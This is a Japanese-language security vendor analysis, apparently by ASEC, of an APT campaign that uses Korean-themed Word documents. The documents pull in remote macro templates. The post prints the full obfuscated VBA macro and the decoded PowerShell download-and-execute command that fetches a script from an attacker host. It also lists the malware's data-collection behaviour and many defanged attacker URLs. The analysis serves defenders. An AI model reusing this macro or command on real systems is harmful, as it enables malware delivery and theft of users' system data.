Word ドキュメントを利用した特定の対象に対する APT 攻撃の試み

ASEC 分析チームは、以前に”「韓国政治外交学術」および「政策諮問委員略歴」の不正な Word ドキュメントの拡散“などで紹介したような不正な Word ドキュメントと同じタイプのマルウェアが、現在も拡散していることを確認した。最近確認された Word ファイルも、従来と同じく External リンクを通じて不正なマクロが含まれた dotm ファイルをダウンロードする。確認されたファイル名と External アドレスは以下の通りである。

発見日ファイル名External URL
7/3[남북회담본부 정책자문위원] 약력 작성 양식.docx
(翻訳:[南北会談本部 製作諮問委員]略歴作成様式.docx)
hxxp://jupit.getenjoyment.net/Package/2006/relationships/InterKoreanSummit.dotm
7/600225 한미의원대화 ***.docx
(翻訳:00225 米韓議員対話 ***.docx)
hxxp://modri.myartsonline.com/officeDocument/2006/relationships/BIO. dotm
7/9*** 교수님 BIO.docx
(翻訳:***教授 BIO.docx)
hxxp://visul.myartsonline.com/officeDocument/2006/relationships/BIO. dotm
7/12*** 교수-BIO.docx
(翻訳:***教授-BIO.docx)
hxxp://ccav.myartsonline.com/officeDocument/2006/relationships/BIO. dotm
7/15BIO 양식.docx
( 翻訳:BIO 様式.docx)
hxxp://tbear.mypressonline.com/officeDocument/2006/relationships/BIO.dotm
[表-1] 拡散しているファイル名と External URL
[図-1] BIO 様式.docx ファイル内の External リンク

ダウンロードされたすべての dotm ファイルは、既に確認されているタイプのマクロと同じものが含まれている。以下は BIO 様式.docx の External リンク(hxxp://tbear.mypressonline.com/officeDocument/2006/relationships/BIO.dotm)からダウンロードされた dotm ファイルに存在していた不正なマクロである。

Private Sub Document_Open()
 eifhhdfasfiedf
 End Sub
  
 Function eifhhdfasfiedf()
 Set djfeihfidkasljf = CreateObject("Shell.Application")
 Dim dfgdfjiejfjdshaj As String
 fjdjkasf = "tlsiajdsladkf"
 fjdjkasf = Left(fjdjkasf, 5)
 dfgdfjiejfjdshaj = "tlsiaptlsiaotlsiawtlsiaetlsiartlsiastlsiahtlsiaetlsialtlsialtlsia.tlsiaetlsiaxtlsiaetlsia"
 dfgdfjiejfjdshaj = Replace(dfgdfjiejfjdshaj, fjdjkasf, "")
 hdfksallasjkdlaf = "tlsia[tlsiastlsiattlsiartlsiaitlsiantlsiagtlsia]tlsia$tlsiaatlsia=tlsia{tlsia(tlsiaNtlsiaetlsiawtlsia-tlsiaOtlsiabtlsiajtlsiaetlsiactlsiattlsia "
 hdfksallasjkdlaf = Replace(hdfksallasjkdlaf, fjdjkasf, "")
 ndkflajdkfjskdjfl = "tlsiaNtlsiaetlsiattlsia.tlsiaWtlsiaetlsiabtlsiaCtlsialtlsiaitlsiaetlsiantlsiattlsia)tlsia.tlsiaDotlsiantlsiagtlsia"
 ndkflajdkfjskdjfl = Replace(ndkflajdkfjskdjfl, fjdjkasf, "")
 salfnxkfdlsjafkj = "('htlsiattlsiattlsiaptlsia:tlsia/tlsia/tlsiattlsiabtlsiaetlsiaatlsiartlsia.tlsiamtlsiaytlsiaptlsiartlsiaetlsiastlsiastlsiaotlsiantlsialtlsiaitlsiantlsiaetlsia.tlsiactlsiaotlsiamtlsia/tlsiactlsiaitlsia/tlsiamotlsia.tlsiattlsiaxtlsiat')"
 salfnxkfdlsjafkj = Replace(salfnxkfdlsjafkj, fjdjkasf, "")
 sjdfkjaslalsfial = "tlsia}tlsia;tlsia$tlsiabtlsia=tlsia$tlsiaatlsia.tlsiaitlsiantlsiastlsiaetlsiartlsiattlsia(tlsia2tlsia9tlsia,tlsia'"
 sjdfkjaslalsfial = Replace(sjdfkjaslalsfial, fjdjkasf, "")
 aksfkjaskjfksnkf = "tlsiatlsiawtlsiantlsialtlsiaotlsiaatlsiadtlsiastlsiattlsiartlsiaitlsia'tlsia)tlsia;tlsia$tlsiactlsia=tlsiaitlsia"
 aksfkjaskjfksnkf = Replace(aksfkjaskjfksnkf, fjdjkasf, "")
 sdfewjdhsajkfhjdf = "etlsiaxtlsia tlsia$tlsiabtlsia;tlsiaitlsiaetlsiaxtlsia tlsia$tlsiactlsia"
 sdfewjdhsajkfhjdf = Replace(sdfewjdhsajkfhjdf, fjdjkasf, "")
 skdjfksjkfjkdsfj = hdfksallasjkdlaf + ndkflajdkfjskdjfl + salfnxkfdlsjafkj + sjdfkjaslalsfial + aksfkjaskjfksnkf + sdfewjdhsajkfhjdf
  
 djfeihfidkasljf.ShellExecute dfgdfjiejfjdshaj, skdjfksjkfjkdsfj, "", "open", 0
  
 End Function

[コード-1] BIO.dotm ファイルに存在しているマクロコード

マクロを実行すると、以下の PowerShell コマンドが実行され、hxxp://tbear.mypressonline.com/ci/mo.txt に存在するスクリプトをダウンロードおよび実行する。

“C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” [string]$a={(New-Object Net.WebClient).Dong(‘hxxp://tbear.mypressonline.com/ci/mo.txt’)};$b=$a.insert(29,’wnloadstri’);$c=iex $b;iex $c
[表-2] PowerShell コマンド
[図-2] hxxp://tbear.mypressonline.com/ci/mo.txt の不正なスクリプト

この不正なスクリプトは、C2 アドレス以外が以前に記事で説明したものと同じであり、以下のようにユーザー情報の収集および追加ファイルのダウンロードなどの行為を実行する。

  • 追加の不正なファイルのダウンロード
  • 最近の実行ファイルリストの収集
  • SystemInfo 収集
  • tasklist 収集
  • 収集したファイルのアップロード

追加で、上記のような不正な dotm をダウンロードする URL と不正なスクリプトが存在する URL が多数確認された。

hxxp://btige.myartsonline.com/officeDocument/2006/relationships/BIO.dotm
hxxp://tbear.mypressonline.com/officeDocument/2006/relationships/BIO.dotm
hxxp://stair.myartsonline.com/officeDocument/2006/relationships/BIO.dotm
hxxp://ccav.myartsonline.com/officeDocument/2006/relationships/BIO.dotm
hxxp://visul.myartsonline.com/officeDocument/2006/relationships/BIO.dotm
hxxp://modri.myartsonline.com/officeDocument/2006/relationships/BIO.dotm
hxxp://ranso.myartsonline.com/Package/2006/relationships/InterKoreanSummit.dotm
hxxp://lieon.mypressonline.com/Package/2006/relationships/InterKoreanSummit.dotm
hxxp://chels.mypressonline.com/Package/2006/relationships/InterKoreanSummit.dotm
hxxp://warcr.onlinewebshop.net/Package/2006/relationships/InterKoreanSummit.dotm
hxxp://jupit.getenjoyment.net/Package/2006/relationships/InterKoreanSummit.dotm
hxxp://ripzi.getenjoyment.net/Package/2006/relationships/InterKoreanSummit.dotm
[表-3] 追加で確認された dotm のダウンロード URL
hxxp://stair.myartsonline.com/ya/ng.txt
hxxp://lovels.myartsonline.com/ys/ha.txt
hxxp://lovel.myartsonline.com/le/ej.txt
hxxp://visul.myartsonline.com/yk/yo.txt
hxxp://vbqwer.mypressonline.com/test.log
hxxp://tbear.mypressonline.com/test.txt
hxxp://obser.mygamesonline.org/nw.txt
hxxp://modri.myartsonline.com/gu/nw.txt
hxxp://warcr.onlinewebshop.net/le/eh.txt
hxxp://stair.atwebpages.com/ne/la.txt
hxxp://giruz.atwebpages.com/sw/cu.txt
hxxp://benze.atwebpages.com/ki/mc.txt
hxxp://likel.atwebpages.com/bu/ma.txt
hxxp://rster.atwebpages.com/an/ce.txt
hxxp://mantc.getenjoyment.net/ya/ng.txt
[表-4] 追加で確認された不正なスクリプトが存在する URL

正常な Word ドキュメントに偽装したターゲット型マルウェアが拡散し続けており、ユーザーは特に注意が必要である。出どころが不明なファイルの閲覧や、ドキュメントファイルのマクロは、実行しないようにしなければならない。また、当該マルウェアはマクロのセキュリティ設定を変更する機能を実行するため、ユーザーはセキュリティ設定のレベルが高く維持されているかを定期的に確認する必要がある。

V3 では、上記で紹介したファイルに対して以下のように検知している。

[ファイル検知]

  • Downloader/XML.External
  • Downloader/DOC.Agent
5 1 vote
評価する
Subscribe
Notify of
guest

1 コメント
Inline Feedbacks
View all comments
trackback

[…] 以前「Word ドキュメントを利用した特定の対象に対する APT 攻撃の試み」の記事で確認されたマクロコードよりもやや難読化されている。マクロを実行すると、PowerShell を通じて「hxxp://vjdif.mypressonline[.]com/ho/ng.txt」からさらなるスクリプトをダウンロードする。 […]